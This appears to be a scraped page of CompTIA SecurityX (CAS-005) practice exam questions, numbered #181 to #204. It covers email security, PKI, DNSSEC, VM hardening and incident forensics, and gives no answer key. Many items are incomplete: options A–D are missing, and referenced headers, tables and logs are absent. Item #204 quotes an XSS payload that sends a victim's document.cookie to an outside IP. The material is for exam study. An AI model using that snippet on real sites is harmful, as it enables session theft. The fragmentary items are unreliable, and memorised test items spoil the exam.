Free Certification Practice Questions

COMPTIA-SECURITYX

CompTIA's CAS-005 A security analyst needs to ensure email domains that send phishing attempts without previous communications are not delivered to mailboxes. The following email headers are being reviewed: Which of the following is the best action for the security analyst to take?
#181
CompTIA's CAS-005 After remote desktop capabilities were deployed in the environment, various vulnerabilities were noticed:
• Exfiltration of intellectual property
• Unencrypted files
• Weak user passwords
Which of the following is the best way to mitigate these vulnerabilities? (Choose two.) E. Enabling modem authentication that supports MFA F. Implementing a version control system G. Implementing a CMDB platform
#182
CompTIA's CAS-005 A company recently experienced an incident in which an advanced threat actor was able to shim malicious code against the hardware stack of a domain controller. The forensic team cryptographically validated that both the underlying firmware of the box and the operating system had not been compromised. However, the attacker was able to exfiltrate information from the server using a steganographic technique within LDAP. Which of the following is the best way to reduce the risk of reoccurrence?
#183
CompTIA's CAS-005 A company's security policy states that any publicly available server must be patched within 12 hours after a patch is released. A recent IIS zero-day vulnerability was discovered that affects all versions of the Windows Server OS: Which of the following hosts should a security analyst patch first once a patch is available? E. 5 F. 6
#184
CompTIA's CAS-005 A company migrating to a remote work model requires that company-owned devices connect to a VPN before logging in to the device itself. The VPN gateway requires that a specific key extension is deployed to the machine certificates in the internal PKI. Which of the following best explains this requirement?
#185
CompTIA's CAS-005 Which of the following best describes the challenges associated with widespread adoption of homomorphic encryption techniques?
#186
CompTIA's CAS-005 During a security assessment using an EDR solution, a security engineer generates the following report about the assets in the system: After five days, the EDR console reports a blocked infection on the host 0WIN23 by a remote access Trojan. Which of the following most likely enabled the attempted infection?
#187
CompTIA's CAS-005 A security engineer must ensure that sensitive corporate information is not exposed if a company laptop is stolen. Which of the following actions best addresses this requirement?
#188
CompTIA's CAS-005 A global company’s Chief Financial Officer (CFO) receives a phone call from someone claiming to be the Chief Executive Officer (CEO). The caller claims to be stranded and in desperate need of money. The CFO is suspicious, but the caller’s voice sounds similar to the CEO’s. Which of the following best describes this type of attack?
#189
CompTIA's CAS-005 A cloud engineer wants to configure mail security protocols to support email authenticity and enable the flow of email security information to a third-party platform for further analysis. Which of the following must be configured to achieve these requirements? (Choose two.) E. DNSSEC F. MX
#190
CompTIA's CAS-005 A company is preparing to move a new version of a web application to production. No issues were reported during security scanning or quality assurance in the CI/CD pipeline. Which of the following actions should the company take next?
#191
CompTIA's CAS-005 A DNS forward lookup zone named comptia.org must:
• Ensure the DNS is protected from on-path attacks.
• Ensure zone transfers use mutual authentication and are authenticated and negotiated.
Which of the following should the security architect configure to meet these requirements? (Choose two.) E. CNAME records F. SRV records
#192
CompTIA's CAS-005 A security architect is implementing a SOAR solution in an organization’s cloud production environment to support detection capabilities. Which of the following will be the most likely benefit?
#193
CompTIA's CAS-005 A cloud security architect has been tasked with finding a solution for hardening VMs. The solution must meet the following requirements:
• Data needs to be stored outside of the VMs.
• No unauthorized modifications to the VMs are allowed.
• If a change needs to be done, a new VM needs to be deployed.
Which of the following is the best solution?
#194
CompTIA's CAS-005 A new, online file hosting service is being offered. The service has the following security requirements:
• Threats to customer data integrity and availability should be remediated first.
• The environment should be dynamic to match increasing customer demands.
• The solution should not interfere with customers’ ability to access their data at any time.
• Security analysts should focus on high-risk items.
Which of the following would best satisfy the requirements?
#195
CompTIA's CAS-005 A university issues badges through a homegrown identity management system to all staff and students. Each week during the summer, temporary summer school students arrive and need to be issued a badge to access minimal campus resources. The security team received a report from an outside auditor indicating the homegrown system is not consistent with best practices in the security field. Which of the following should the security team recommend first?
#196
CompTIA's CAS-005 A penetration tester discovers a condition that causes unexpected behavior in a web application. This results in the dump of the interpreter’s debugging information, which includes the interpreter’s version, full path of binary files, and the user ID running the process. Which of the following actions would best mitigate this risk?
#197
CompTIA's CAS-005 To bring digital evidence in a court of law, the evidence must be:
#198
CompTIA's CAS-005 A junior developer is informed about the impact of new malware on an Advanced RISC Machine (ARM) CPU, and the code must be fixed accordingly. Based on the debug, the malware is able to insert itself in another process memory location. Which of the following technologies can the developer enable on the ARM architecture to prevent this type of malware?
#199
CompTIA's CAS-005 A system of globally distributed certificate servers connected to HSMs provides certificate security services for a publicly available PKI. These services include OCSP, certificate revocation list issuance, and certificate signing/issuance. The HSMs are all physical devices. All other servers are virtualized. Each global site has a network load balancer, and the sites are configured to load balance between sites.
Users report occasional but persistent log-on failures to different PKI-enabled websites. There is no apparent pattern to the failures. Some OCSP responses must be signed by the HSM. Each HSM is connected to a physical server containing multiple VMs for the local site with CAT 6e network cable. The backplane connecting the VMs is fiber based.
Which of the following would best reduce the OCSP response time in order to rule out the connection between the certificate server and HSM as a cause of the user-reported issues?
#200
CompTIA's CAS-005 While investigating an email server that crashed, an analyst reviews the following log files: Which of the following is most likely the root cause?
#201
CompTIA's CAS-005 A company detects suspicious activity associated with inbound connections. Security detection tools are unable to categorize this activity. Which of the following is the best solution to help the company overcome this challenge?
#202
CompTIA's CAS-005 An engineer wants to automate several tasks by running commands daily on a UNIX server. The engineer has only built-in, default tools available. Which of the following should the engineer use to best assist with this effort? (Choose two.) E. Bash F. Task Scheduler
#203
CompTIA's CAS-005 During a forensic review of a cybersecurity incident, a security engineer collected a portion of the payload used by an attacker on a compromised web server. Given the following portion of the code:
..asd...document.location="https://10.10.1.2/?"x“+document.cookie; ..12..fa..<>...ash214%621...41..2...8.8.
Which of the following best describes this incident?
#204